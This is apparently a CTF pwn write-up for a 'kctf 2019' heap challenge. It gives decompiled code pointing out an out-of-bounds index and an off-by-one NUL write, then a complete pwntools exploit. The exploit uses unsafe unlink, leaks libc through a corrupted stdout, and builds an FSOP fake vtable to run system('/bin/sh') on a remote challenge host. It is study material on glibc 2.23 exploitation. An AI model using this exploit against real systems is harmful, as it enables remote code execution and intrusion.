学习安全两年半的个人安全研究者，擅长 pwn，希望和各位大佬多多交流。
/*
 * Decompiled entry point of the challenge binary (IDA output, tidied up).
 *
 * Calls f_set_hook_E4C() (body not shown here), prints the banner and then
 * serves the menu forever: 1 = add, 2 = delete, 3 = edit, 4 = exit(0).
 * Any other value prints "Invalid choice".  The function never returns.
 *
 * a1..a3 are the decompiler's names for argc/argv/envp and are unused.
 * The interesting bugs live in the edit path (f_edit_1084 / sub_D22).
 */
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
    f_set_hook_E4C();
    puts("Welcome kctf 2019,you pwn like hsy!");
    for (;;)
    {
        f_menu_DDD();
        switch ( f_get_char_num_C81() )
        {
        case 1:
            f_add_EC3();
            break;
        case 2:
            f_delete_FC0();
            break;
        case 3:
            f_edit_1084();
            break;
        case 4:
            exit(0);
        default:
            puts("Invalid choice");
            break;
        }
    }
}
/*
 * Menu option 3: overwrite the contents of an existing entry.
 *
 * Reads an index and uses it to address g_heap_arr_202080 as pairs of
 * 8-byte slots: slot 2*idx is passed to sub_D22() as the byte count (its low
 * 32 bits must be non-zero, otherwise the process ends with exit(1)), and
 * slot 2*idx+1 is passed as the destination buffer.  The count is presumably
 * the allocation size recorded by f_add_EC3 (body not shown).
 *
 * Security note: idx is used exactly as typed.  There is no lower or upper
 * bound check, so a negative or oversized index addresses memory before or
 * after the array, and whatever two qwords live there are treated as a
 * length and a writable pointer.  This is the out-of-bounds write the
 * exploit below drives with idx = -6.
 *
 * The return value is the compiler's stack-canary comparison and means
 * nothing to callers.
 */
unsigned __int64 f_edit_1084()
{
    unsigned __int64 canary = __readfsqword(0x28u);
    int idx;

    printf("Input idx : ");
    idx = f_get_char_num_C81();
    if ( !LODWORD(g_heap_arr_202080[2 * idx]) )
        exit(1);
    printf("Input text : ");
    sub_D22((char *)g_heap_arr_202080[2 * idx + 1], g_heap_arr_202080[2 * idx]);
    return __readfsqword(0x28u) ^ canary;
}
/*
 * Read a line from stdin into a1, one byte at a time, for at most a2 bytes.
 *
 * Stops at the first '\n' (consumed, not stored) or once a2 bytes have been
 * stored.  A read() returning 0 or -1 terminates the process via exit(1).
 *
 * Return value (decompiler artefact, smuggled through a char*): the number
 * of bytes stored - EXCEPT when the loop ran the full a2 bytes without a
 * newline, in which case a NUL is stored at a1[a2] and &a1[a2] is returned.
 *
 * Security note: that NUL lands at a1[a2], one byte PAST an a2-byte buffer.
 * f_edit_1084 passes the size it has recorded for the entry, so a payload of
 * exactly that length with no trailing newline overwrites the first byte
 * after the buffer - in a heap chunk that is the low byte of the next
 * chunk's size field (the classic off-by-one NUL overflow).  Conversely,
 * when a newline ends the input early no terminator is written at all, so
 * the buffer must not be treated as a C string.
 */
char *__fastcall sub_D22(char *a1, int a2)
{
    unsigned __int64 canary = __readfsqword(0x28u);
    char byte[8];
    int n = 0;

    memset(byte, 0, 8uLL);
    while ( n < a2 )
    {
        if ( read(0, byte, 1uLL) <= 0 )
            exit(1);
        if ( byte[0] == 0xA )
            break;
        a1[n++] = byte[0];
    }
    if ( n == a2 )
    {
        /* off-by-one: a1[a2] is outside an a2-byte buffer */
        a1[n] = 0;
        return &a1[n];
    }
    return (char *)(unsigned int)n;
}
pwndbg> p *(struct _IO_FILE_plus *) stdout
$1 = {
file = {
_flags = 0xfbad2887,
_IO_read_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_read_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_read_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_write_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "",
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7dd18e0 <_IO_2_1_stdin_>,
_fileno = 0x1,
_flags2 = 0x0,
_old_offset = 0xffffffffffffffff,
_cur_column = 0x0,
_vtable_offset = 0x0,
_shortbuf = "",
_lock = 0x7ffff7dd3780 <_IO_stdfile_1_lock>,
_offset = 0xffffffffffffffff,
_codecvt = 0x0,
_wide_data = 0x7ffff7dd17a0 <_IO_wide_data_1>,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0x0,
_mode = 0xffffffff,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}
from pwn import *
import os
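context.log_level = 'debug'
local = False
if local:
    # Run the binary against the libc it shipped with.  The second argument
    # must be RELATIVE: os.path.join() drops everything before an absolute
    # component, so "/libc-2.23.so" resolved to the filesystem root instead
    # of the current directory.  If the preloaded libc does not match the
    # system ld.so the process may die at startup; pair it with the matching
    # loader in that case.
    env = {"LD_PRELOAD": os.path.join(os.getcwd(), "libc-2.23.so")}
    p = process("./pwn", env=env)
else:
    p = remote("154.8.174.214", 10001)
raw_input("Pause~\n")

# Offsets inside the challenge's libc-2.23.so (they appear to be the common
# Ubuntu 16.04 build).  Only valid for that exact library - recompute for
# any other libc.
offset_system = 0x0000000000045390
offset_IO_list_all = 0x00000000003C5520
base_addr = 0
heap_addr = {}  # menu index -> user pointer printed by the "add" option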
def new_heap(len):
    """Menu option 1: allocate an entry of `len` bytes and record its address.

    The binary answers with a line of the form ``heap <idx> ... 0x<addr>``
    (only the ``heap ``, ``0x`` and newline delimiters are relied upon).
    The parsed address is stored in the global ``heap_addr`` under the index
    the binary assigned.  Talks over the global tube ``p``.
    """
    p.recvuntil(">>")
    p.sendline("1")
    p.recvuntil("Input size : ")
    p.sendline(str(len))
    print 'create new heap:' , len
    # Parse "heap <idx> ... 0x<hex>\n"
    p.recvuntil("heap ")
    index_text = p.recvuntil(" ", drop=True)
    print index_text
    p.recvuntil("0x")
    addr_text = p.recvuntil("\n", drop=True)
    print addr_text
    heap_addr[int(index_text)] = int(addr_text, 16)
def set_heap(idx, cont):
    """Menu option 3: write `cont` into the entry at `idx` (via sub_D22).

    Deliberately uses send(), not sendline(): the binary pulls input one byte
    at a time until it sees '\\n' or has read the entry's recorded size.  A
    payload that must reach the full size (to trigger the trailing NUL write
    into the next chunk) therefore carries no newline, while shorter payloads
    append their own '\\x0a'.

    Unlike new_heap()/del_heap(), no '>>' prompt is consumed first; the menu
    prompt, if the binary printed one, is left in the tube for the caller.
    """
    idx_text = str(idx)
    p.sendline("3")
    p.recvuntil("Input idx : ")
    p.sendline(idx_text)
    p.recvuntil("Input text : ")
    p.send(cont)
    print 'set text ' , idx,',cont = ',cont
def del_heap(idx):
    """Menu option 2: free the entry at `idx`.

    Waits for the '>>' prompt before choosing the option.  In the exploit
    below this free is what triggers backward consolidation once the
    neighbouring chunk headers have been corrupted.
    """
    print 'del_heap ' , idx
    p.recvuntil(">>")
    p.sendline("2")
    p.recvuntil("Input idx : ")
    p.sendline(str(idx))
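# ---------------------------------------------------------------------------
# Stage 1 - heap grooming.
# A request of 0xf8 bytes yields a 0x100-byte chunk, so writing exactly 0xf8
# bytes with no newline makes sub_D22() put its terminating NUL one byte past
# the buffer: on the low byte of the NEXT chunk's size field.
# ---------------------------------------------------------------------------
new_heap(0xf8)
new_heap(0xf8)
new_heap(0xf8)
new_heap(0xf8)
new_heap(0xf8)
print("Get All Addr:")
print(heap_addr)

# Chunk 0: fake free-chunk header whose fd/bk both point at chunk 1's user
# pointer - the partner record that glibc's unlink() check
# (P->fd->bk == P && P->bk->fd == P) will look at.  Short payload, so it
# carries its own '\x0a' terminator.
payload = p64(0) + p64(0xf1) + p64(heap_addr[1]) + p64(heap_addr[1]) + '\x0a'
set_heap(0, payload)

# Chunk 1: fake chunk of size 0xf0|PREV_INUSE at heap_addr[1] with fd/bk ->
# chunk 0's user pointer, padding, then 0xf0 as chunk 2's prev_size.
# Exactly 0xf8 bytes and NO newline: the trailing NUL clears PREV_INUSE in
# chunk 2's size byte (0x101 -> 0x100).
payload = p64(0x110) + p64(0xf1) + p64(heap_addr[0]) + p64(heap_addr[0]) + 'a' * 0xd0 + p64(0xf0)
set_heap(1, payload)

# Freeing chunk 2 now consolidates backwards into the fake chunk at
# heap_addr[1].  The merged chunk goes to the unsorted bin, so its fd/bk at
# heap_addr[1]+0x10 / +0x18 become &main_arena.top (main_arena+88 on 2.23).
del_heap(2)

# ---------------------------------------------------------------------------
# Stage 2 - libc leak through stdout.
# idx -6 is outside the menu's array; g_heap_arr_202080[-12]/[-11] presumably
# hold the binary's stdin/stdout pointers, so the "size" check sees the low
# dword of a libc pointer (non-zero) and the destination is stdout's FILE
# itself.  Flags 0xfbad8800 with _IO_write_base = heap_addr[1]+0x10 and
# _IO_write_ptr = heap_addr[1]+0x18 make the next flush emit exactly those
# 8 bytes - the unsorted-bin fd.  Field order follows the struct dump above.
# ---------------------------------------------------------------------------
payload = p64(0xfbad8800)                # _flags
payload += p64(heap_addr[0]+8)           # _IO_read_ptr
payload += p64(heap_addr[1]+0x10)        # _IO_read_end
payload += p64(heap_addr[0]+8)           # _IO_read_base
payload += p64(heap_addr[1]+0x10)        # _IO_write_base  -> leaked qword
payload += p64(heap_addr[1]+0x10+8)      # _IO_write_ptr
payload += p64(heap_addr[1]+0x10+8)      # _IO_write_end
payload += p64(heap_addr[0]+8)           # _IO_buf_base
payload += p64(heap_addr[0]+8+1)         # _IO_buf_end
set_heap(-6, payload)
p.sendline('q')
# recvn() blocks until all 8 bytes have arrived; recv(8) may return fewer
# on a fragmented read and u64() would then fail.
main_arena = u64(p.recvn(8))-88
# 0x3c4b20 is main_arena's offset in the challenge's libc-2.23; keep it in
# step with offset_system / offset_IO_list_all if the libc changes.
libc_base = main_arena-0x3c4b20
libc_system = libc_base+offset_system
IO_list_all = libc_base+offset_IO_list_all
print('main_arena: 0x%08x\nlibc_base: 0x%08x\nlibc_system: 0x%08x\nIO_list_all: 0x%08x' %
      (main_arena, libc_base, libc_system, IO_list_all))
raw_input("Pause~\n")

# Put stdout back into a sane, effectively unbuffered state (the original
# flags 0xfbad2887 and a one-byte buffer at heap_addr[0]+8) so the menu
# keeps responding.
payload = p64(0xfbad2887)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8+1)
set_heap(-6, payload)
p.sendline('q')

# ---------------------------------------------------------------------------
# Stage 3 - FSOP.  Chunk 4 becomes a fake vtable whose every slot is system,
# then stdout is replaced by a fake FILE whose _flags start with "/bin/sh\0"
# and whose vtable pointer is chunk 4.  The next stdout operation dispatches
# through the vtable, so system() runs with the FILE pointer - i.e. the
# string "/bin/sh" - as its argument.  This relies on glibc 2.23 doing no
# vtable validation; 2.24+ aborts in IO_validate_vtable on a heap vtable.
# ---------------------------------------------------------------------------
payload = p64(libc_system) * 8 + '\x0a'
set_heap(4, payload)

payload = '/bin/sh\x00'                  # _flags (doubles as the command)
payload += p64(heap_addr[0]+8)           # _IO_read_ptr
payload += p64(heap_addr[1]+0x10)        # _IO_read_end
payload += p64(heap_addr[0]+8)           # _IO_read_base
payload += p64(heap_addr[1])             # _IO_write_base
payload += p64(heap_addr[1]+0x10)        # _IO_write_ptr (> write_base: output pending)
payload += p64(heap_addr[1]+0x10+8)      # _IO_write_end
payload += p64(heap_addr[1]+0x10)        # _IO_buf_base
payload += p64(heap_addr[1]+0x10+8)      # _IO_buf_end
payload += p64(0)                        # _IO_save_base
payload += p64(0)                        # _IO_backup_base
payload += p64(0)                        # _IO_save_end
payload += p64(0)                        # _markers
payload += p64(heap_addr[0])             # _chain
payload += p64(1)                        # _fileno = 1 / _flags2 = 0
payload += p64(0xffffffffffffffff)       # _old_offset
payload += p64(0)                        # _cur_column / _vtable_offset / _shortbuf
payload += p64(heap_addr[0])             # _lock -> writable heap memory
payload += p64(0xffffffffffffffff)       # _offset
payload += p64(0)                        # _codecvt
payload += p64(heap_addr[0])             # _wide_data
payload += p64(0)                        # _freeres_list
payload += p64(0)                        # _freeres_buf
payload += p64(0)                        # __pad5
payload += p64(0x0000000000000000)       # _mode = 0 -> narrow-stream path
payload += p64(0)                        # _unused2
payload += p64(0)                        # _unused2
payload += p64(heap_addr[4])             # vtable -> chunk 4 (all system)
set_heap(-6, payload)
raw_input("Success, press Enter~\n")
p.interactive()
p.close()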